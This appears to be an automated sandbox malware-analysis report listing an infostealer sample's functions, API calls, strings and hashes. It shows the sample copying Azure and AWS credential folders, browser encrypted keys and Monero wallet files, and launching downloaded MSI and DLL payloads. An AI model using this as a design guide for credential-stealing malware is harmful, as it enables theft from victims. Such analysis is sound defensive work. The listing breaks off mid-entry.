                                    • Instruction ID: c18e402114fa3d83d65a281eb92e967f93de3c18571697b95138a2f9835952bd
                                    • Opcode Fuzzy Hash: 50e48f85e149a37368dcc4d6ceb994ea5e09e6983af762bbfed34d05e69fda38
                                    • Instruction Fuzzy Hash: FEE1EB71D00108ABDB18EBE5DC92FEEB7B8AF54300F404169F11667591EF38AA4ADF61
                                    Function 00FB8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • RegOpenKeyExA.ADVAPI32(00000000,008CAFE8,00000000,00020019,00000000,00FC05B6), ref: 00FB83A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FB8426
                                    • wsprintfA.USER32 ref: 00FB8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FB847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FB8499
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: ec6989de3229f6ff75c37167cfce7f473764d4dabdb21fbd13fd2cadee65699c
                                    • Instruction ID: 9599d70cf9adad2a3a97a5418eeed289f941017aa6f0d7103da4b276cba58437
                                    • Opcode Fuzzy Hash: ec6989de3229f6ff75c37167cfce7f473764d4dabdb21fbd13fd2cadee65699c
                                    • Instruction Fuzzy Hash: 4E810071910118ABDB28DB91DD95FEA77BCBF48700F008299E10AA6180DF75AF86DF90
                                    Function 00FB4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00FB4DCD
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB492C
                                      • Part of subcall function 00FB4910: FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00FB4E59
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                      • Part of subcall function 00FB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                      • Part of subcall function 00FB4910: FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB4EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FB4EE5
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB49B0
                                      • Part of subcall function 00FB4910: StrCmpCA.SHLWAPI(?,00FC08D2), ref: 00FB49C5
                                      • Part of subcall function 00FB4910: wsprintfA.USER32 ref: 00FB49E2
                                      • Part of subcall function 00FB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FB4A1E
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,008CEB18), ref: 00FB4A4A
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,00FC0FF8), ref: 00FB4A5C
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,?), ref: 00FB4A70
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,00FC0FFC), ref: 00FB4A82
                                      • Part of subcall function 00FB4910: lstrcat.KERNEL32(?,?), ref: 00FB4A96
                                      • Part of subcall function 00FB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FB4AAC
                                      • Part of subcall function 00FB4910: DeleteFileA.KERNEL32(?), ref: 00FB4B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: bc030e35e2db75941ee5b6d0c942a12abff8984592adf7805256c41ef3f1180d
                                    • Instruction ID: a80a106aadd60e93a223f362e94a01e6e549016fa864eb362ddd50018d13c9a3
                                    • Opcode Fuzzy Hash: bc030e35e2db75941ee5b6d0c942a12abff8984592adf7805256c41ef3f1180d
                                    • Instruction Fuzzy Hash: 7D41B6BA94020867DB24F7B0ED47FED3778AB65701F0044587185A60C2EEB89BD99F93
                                    Function 00FB9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FB906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: e22cb3702372cc771bf48b8ed91694968819f0ef1c9441912ffda07f6f21d89e
                                    • Instruction ID: c4298a47ff954252cfb045e3bb44db3cd2bf5b1e3deeb6c86cb812543349dc97
                                    • Opcode Fuzzy Hash: e22cb3702372cc771bf48b8ed91694968819f0ef1c9441912ffda07f6f21d89e
                                    • Instruction Fuzzy Hash: C871DBB5D10208ABDB14DFE4E889FEDB7B9BF48700F108518F615AB284DB74A945DB60
                                    Function 00FB2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB31C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB34EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 1ff6c452f12678ff0d1a4665775aa770ba57086918066a5d9ca5ec4cded1e7d3
                                    • Instruction ID: e2323205ac531fd3aa057574ef89be54af65dd972b2eab2fb6e3d027ed0c21f9
                                    • Opcode Fuzzy Hash: 1ff6c452f12678ff0d1a4665775aa770ba57086918066a5d9ca5ec4cded1e7d3
                                    • Instruction Fuzzy Hash: 27122271800108EADB19FBA1DC92FEDB778AF14300F544169F50676591EF386B4AEFA2
                                    Function 00FB52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA6280: InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                      • Part of subcall function 00FA6280: StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                      • Part of subcall function 00FA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                      • Part of subcall function 00FA6280: HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                      • Part of subcall function 00FA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                      • Part of subcall function 00FA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5318
                                    • lstrlen.KERNEL32(00000000), ref: 00FB532F
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00FB5364
                                    • lstrlen.KERNEL32(00000000), ref: 00FB5383
                                    • lstrlen.KERNEL32(00000000), ref: 00FB53AE
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 6496872079f509ff13408201d94d4b73be834c4de03d3a7be56a34054993dafb
                                    • Instruction ID: 43234b2fe8217cc314fcf3af8fbd4cb8832cb5412acf43a43c5505c18be16f3b
                                    • Opcode Fuzzy Hash: 6496872079f509ff13408201d94d4b73be834c4de03d3a7be56a34054993dafb
                                    • Instruction Fuzzy Hash: DB510E70910148ABCB24FF61CDA2BED7779AF10301F504018F4066B592EF38AB55EF62
                                    Function 00FB12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0d3ddbc8f9a726fafd76727dfc4f6db4af584eede1d7baa3e5ed45c765e2d7da
                                    • Instruction ID: 3cd626bda36bc39c74cb4a07350e021cd63aa727957f23ae9fedae19ed60dc09
                                    • Opcode Fuzzy Hash: 0d3ddbc8f9a726fafd76727dfc4f6db4af584eede1d7baa3e5ed45c765e2d7da
                                    • Instruction Fuzzy Hash: 3DC1B5B590020DABCB28EFA1DC99FEA7378BF54304F104598E11AA7141EB74EA85DF91
                                    Function 00FB4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FB8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB42EC
                                    • lstrcat.KERNEL32(?,008CE298), ref: 00FB430B
                                    • lstrcat.KERNEL32(?,?), ref: 00FB431F
                                    • lstrcat.KERNEL32(?,008CD3F0), ref: 00FB4333
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FB8D90: GetFileAttributesA.KERNEL32(00000000,?,00FA1B54,?,?,00FC564C,?,?,00FC0E1F), ref: 00FB8D9F
                                      • Part of subcall function 00FA9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FA9D39
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB93C0: GlobalAlloc.KERNEL32(00000000,00FB43DD,00FB43DD), ref: 00FB93D3
                                    • StrStrA.SHLWAPI(?,008CE208), ref: 00FB43F3
                                    • GlobalFree.KERNEL32(?), ref: 00FB4512
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                      • Part of subcall function 00FA9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                      • Part of subcall function 00FA9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                      • Part of subcall function 00FA9AC0: LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FB44A3
                                    • StrCmpCA.SHLWAPI(?,00FC08D1), ref: 00FB44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FB44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00FB44E5
                                    • lstrcat.KERNEL32(00000000,00FC0FB8), ref: 00FB44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 372b2bdbb2c4816c63f404826c6e1792d4cf0f400cdcb895bcc0645693633dd7
                                    • Instruction ID: af502799e8333fb09e7dd94a638d4fab6a21c12d4e21cb9e3c3ec2e1f3591a2c
                                    • Opcode Fuzzy Hash: 372b2bdbb2c4816c63f404826c6e1792d4cf0f400cdcb895bcc0645693633dd7
                                    • Instruction Fuzzy Hash: 627174B6900208ABDB24EBE0DC85FEE77BDAF88300F044598F61597181DA78EB55DF91
                                    Function 00FA1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FA12B4
                                      • Part of subcall function 00FA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FA12BB
                                      • Part of subcall function 00FA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FA12D7
                                      • Part of subcall function 00FA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FA12F5
                                      • Part of subcall function 00FA12A0: RegCloseKey.ADVAPI32(?), ref: 00FA12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FA134F
                                    • lstrlen.KERNEL32(?), ref: 00FA135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00FA1377
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FA1465
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FA14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
